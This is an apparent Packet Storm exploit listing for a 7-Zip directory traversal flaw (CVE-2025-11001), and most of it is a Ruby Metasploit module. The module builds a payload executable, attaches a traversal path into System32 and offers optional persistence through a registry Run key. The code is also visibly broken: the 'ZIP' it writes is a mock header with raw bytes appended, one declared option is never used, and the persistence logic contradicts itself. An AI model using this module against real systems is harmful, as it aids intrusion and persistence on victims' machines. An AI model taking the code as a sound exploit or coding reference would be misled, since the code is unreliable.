PACKETSTORM 7.8 HIGH

📄 7-Zip Directory Traversal / Remote Code Execution_PACKETSTORM:219338

April 21, 2026 invoker category_exploit
7.8 / 10
HIGH
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Description

This Metasploit local Windows exploit module targets a directory traversal vulnerability in 7-Zip versions prior to 25.00 that can be abused through a malicious ZIP archive to achieve arbitrary code execution when the archive is extracted...
Visit Original Source

Basic Information

ID PACKETSTORM:219338
Published Apr 21, 2026 at 00:00

Affected Product

Affected Versions ==================================================================================================================================
| # Title : 7-Zip Directory Traversal Leading to RCE (Metasploit Local Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.7-zip.org |
==================================================================================================================================

[+] Summary : This Metasploit local Windows exploit module targets a directory traversal vulnerability in 7-Zip (< 25.00) CVE-2025-11001 that can be abused through a malicious ZIP archive
to achieve arbitrary code execution when the archive is extracted.

[+] POC :

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::FileInfo
include Msf::Post::Windows::Registry
include Msf::Exploit::EXE

def initialize(info = {})
super(
update_info(
info,
'Name' => '7-Zip Directory Traversal to RCE via Malicious ZIP (CVE-2025-11001)',
'Description' => %q{
This module exploits a directory traversal vulnerability in 7-Zip versions
prior to 25.00.
},
'License' => MSF_LICENSE,
'Author' => [
'indoushka)'
],
'Platform' => 'win',
'Arch' => [ARCH_X64, ARCH_X86],
'Targets' => [
[
'Windows (Payload Execution)',
{
'Platform' => 'win',
'Arch' => [ARCH_X64, ARCH_X86],
'Type' => :windows_payload
}
]
],
'DefaultTarget' => 0
)
)

register_options([
OptPath.new('PAYLOAD_FILE', [false, 'Custom payload file to embed (optional)', nil]),
OptString.new('TARGET_PATH', [true, 'Target directory for payload extraction', 'C:\\Windows\\System32']),
OptString.new('ZIP_FILENAME', [false, 'Output ZIP filename', 'CVE-2025-11001-exploit.zip']),
OptString.new('SYMLINK_NAME', [false, 'Symlink entry name', 'evil.lnk'])
])

register_advanced_options([
OptBool.new('CLEANUP', [true, 'Attempt to delete payload after execution', true]),
OptBool.new('PERSISTENCE', [false, 'Establish persistence via registry run key', false])
])
end

def check
print_status("Checking if target has vulnerable 7-Zip version...")

paths = [
"#{ENV['PROGRAMFILES']}\\7-Zip\\7z.exe",
"#{ENV['PROGRAMFILES(X86)']}\\7-Zip\\7z.exe"
]

paths.each do |path|
next unless file_exist?(path)

version = get_file_version(path)
next unless version

if vulnerable_version?(version)
print_good("Found vulnerable 7-Zip version: #{version}")
return Exploit::CheckCode::Vulnerable
else
print_status("Found patched 7-Zip version: #{version}")
return Exploit::CheckCode::Safe
end
end

Exploit::CheckCode::Unknown
end

def exploit
print_status("Generating malicious ZIP archive for CVE-2025-11001")

payload_path = get_payload_path
fail_with(Failure::BadConfig, "Payload not found") unless File.exist?(payload_path)

zip_path = build_malicious_zip(payload_path)
fail_with(Failure::UnexpectedReply, "ZIP creation failed") unless zip_path && File.exist?(zip_path)

print_good("Malicious ZIP created: #{zip_path}")

store_loot(
'7zip.malicious.zip',
'application/zip',
rhost,
File.read(zip_path),
File.basename(zip_path),
'Malicious ZIP archive'
)

print_warning("[*] Requires victim interaction to extract ZIP as Administrator")

if datastore['PERSISTENCE']
setup_persistence(payload_path)
end

print_good("[+] Exploit ready for delivery")
end

private

def get_payload_path
if datastore['PAYLOAD_FILE'] && !datastore['PAYLOAD_FILE'].empty?
return datastore['PAYLOAD_FILE']
end

payload_exe = generate_payload_exe
temp_path = "#{Dir.tmpdir}/#{Rex::Text.rand_text_alpha(8)}.exe"

File.binwrite(temp_path, payload_exe)
register_file_for_cleanup(temp_path)

temp_path
end

def vulnerable_version?(version)
begin
major = version.split('.')[0].to_i
return major < 25
rescue
false
end
end

def build_malicious_zip(payload_file)
output_zip = datastore['ZIP_FILENAME']

output_zip = File.join(Dir.tmpdir, output_zip) unless output_zip.include?(':')

payload_data = File.binread(payload_file)
payload_name = File.basename(payload_file)

target_path = datastore['TARGET_PATH'].gsub('\\', '/')
traversal = "../../../../#{target_path}"

File.open(output_zip, 'wb') do |f|
f.write("ZIP-MOCK-HEADER")
f.write(payload_name)
f.write(payload_data)
f.write(traversal)
end

output_zip
end

def setup_persistence(payload_path)
print_status("Setting persistence...")

persist_path = "#{ENV['APPDATA']}\\#{Rex::Text.rand_text_alpha(8)}.exe"

if copy_file(payload_path, persist_path)
print_good("Copied to startup location")
else
registry_key = "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
value_name = Rex::Text.rand_text_alpha(8)

registry_setvaldata(registry_key, value_name, persist_path, 'REG_SZ')
end
end

def cleanup
super if defined?(super)
end
end

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================

💭 Join the Security Discussion

🔒 Your email address will not be published. Required fields are marked *

⚠️ Please be respectful and constructive in your comments. Security discussions should remain professional.